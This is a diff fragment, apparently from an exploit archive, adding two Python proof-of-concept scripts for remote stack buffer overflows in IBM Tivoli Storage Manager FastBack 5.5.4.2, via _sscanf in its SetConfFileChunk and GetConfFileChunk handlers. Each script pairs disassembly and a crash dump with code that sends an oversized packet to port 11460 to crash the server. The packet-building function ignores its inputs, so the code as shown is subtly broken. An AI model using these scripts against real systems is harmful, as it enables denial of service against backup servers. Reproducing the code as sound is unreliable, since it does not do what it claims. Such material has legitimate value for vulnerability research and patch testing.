+#
+# Vendor Homepage: http://www.ibm.com/
+# Software Name: IBM Tivoli Storage Manager FastBack
+# Software Version: 5.5.4.2 (x86)
+# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
+# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
+# (Version 5.5.4.2, Size: 120.7 MB)
+#
+# Tested on: Windows 7 Professional (x86)
+#
+################################################################################
+#
+# Vulnerability:
+# ==============
+#
+# The vulnerability is a stack buffer overflow in the _FXCLI_SetConfFileChunk
+# function caused by the insecure usage of _sscanf while parsing user-controlled
+# input.
+#
+# .text:00578D28 lea eax, [ebp+var_8]
+# .text:00578D2B push eax
+# .text:00578D2C lea ecx, [ebp+var_C]
+# .text:00578D2F push ecx
+# .text:00578D30 lea edx, [ebp+var_318]
+# .text:00578D36 push edx
+# .text:00578D37 lea eax, [ebp+var_4]
+# .text:00578D3A push eax
+# .text:00578D3B lea ecx, [ebp+Str1] <=== Buffer that will be overwritten
+# .text:00578D41 push ecx
+# .text:00578D42 push offset $SG128695 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
+# .text:00578D47 mov edx, [ebp+Src]
+# .text:00578D4A push edx ; Src <=== Buffer under our control
+# .text:00578D4B call _sscanf <=== Stack Buffer Overflow!!!
+#
+################################################################################
+#
+# Crash:
+# ======
+#
+# (a20.ee8): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00000000 ebx=01cd4fb8 ecx=01eaca78 edx=776870b4 esi=01cd4fb8 edi=00000000
+# eip=41414141 esp=01eae324 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
+# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+# 41414141 ?? ???
+#
+################################################################################
+
+import sys
+import time
+import socket
+from struct import pack
+
+
+def create_pkt(opcode, p1="", p2="", p3=""):
+
+ # psAgentCommand (0x30 bytes)
+ buf = "\x44" * 0xC
+ buf+= pack("i", len(buf)-4) + buf
+
+ return buf
+
+
+def main():
+ if len(sys.argv) != 2:
+ print "Usage: %s \n" % sys.argv[0]
+ sys.exit(1)
+
+ server = sys.argv[1]
+ port = 11460
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((server, port))
+
+ pkt = create_pkt( opcode=0x534,
+ p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
+ p2 = "B" * 24000,
+ p3 = "C" * 24000 )
+
+ s.send(pkt)
+ s.close()
+
+ print "[+] Packet sent."
+ sys.exit(0)
+
+
+if __name__ == "__main__":
+ main()
diff --git a/platforms/windows/dos/38980.py b/platforms/windows/dos/38980.py
new file mode 100755
index 000000000..45110ba5d
--- /dev/null
+++ b/platforms/windows/dos/38980.py
@@ -0,0 +1,115 @@
+#!/usr/bin/python
+#
+################################################################################
+#
+# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
+# _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability
+# Date: 14 December 2015
+# Author: Gianni Gnesa (gnix)
+#
+# Vendor Homepage: http://www.ibm.com/
+# Software Name: IBM Tivoli Storage Manager FastBack
+# Software Version: 5.5.4.2 (x86)
+# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
+# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
+# (Version 5.5.4.2, Size: 120.7 MB)
+#
+# Tested on: Windows 7 Professional (x86)
+#
+################################################################################
+#
+# Vulnerability:
+# ==============
+#
+# The vulnerability is a stack buffer overflow in the _FXCLI_GetConfFileChunk
+# function caused by the insecure usage of _sscanf while parsing user-controlled
+# input.
+#
+# .text:0057898E lea eax, [ebp+var_210]
+# .text:00578994 push eax
+# .text:00578995 lea ecx, [ebp+var_108]
+# .text:0057899B push ecx
+# .text:0057899C lea edx, [ebp+var_20C]
+# .text:005789A2 push edx
+# .text:005789A3 lea eax, [ebp+var_4]
+# .text:005789A6 push eax
+# .text:005789A7 lea ecx, [ebp+var_104] <=== Buffer that will be overwritten
+# .text:005789AD push ecx
+# .text:005789AE push offset $SG128635 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
+# .text:005789B3 mov edx, [ebp+Src]
+# .text:005789B6 push edx ; Src <=== Buffer under our control
+# .text:005789B7 call _sscanf <=== Stack Buffer Overflow!!!
+#
+################################################################################
+#
+# Crash:
+# ======
+#
+# (b44.9dc): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00000000 ebx=01cd4fb8 ecx=01dacf8c edx=776870b4 esi=01cd4fb8 edi=00000000
+# eip=41414141 esp=01dae328 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
+# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+# 41414141 ?? ???
+#
+################################################################################
+
+import sys
+import time
+import socket
+from struct import pack
+
+
+def create_pkt(opcode, p1="", p2="", p3=""):
+
+ # psAgentCommand (0x30 bytes)
+ buf = "\x44" * 0xC
+ buf+= pack("i", len(buf)-4) + buf
+
+ return buf
+
+
+def main():
+ if len(sys.argv) != 2:
+ print "Usage: %s \n" % sys.argv[0]
+ sys.exit(1)
+
+ server = sys.argv[1]
+ port = 11460
+
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((server, port))
+
+ pkt = create_pkt( opcode=0x531,
+ p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
+ p2 = "B" * 24000,
+ p3 = "C" * 24000 )
+
+ s.send(pkt)
+ s.close()
+
+ print "[+] Packet sent."
+ sys.exit(0)
+
+
+if __name__ == "__main__":
+ main()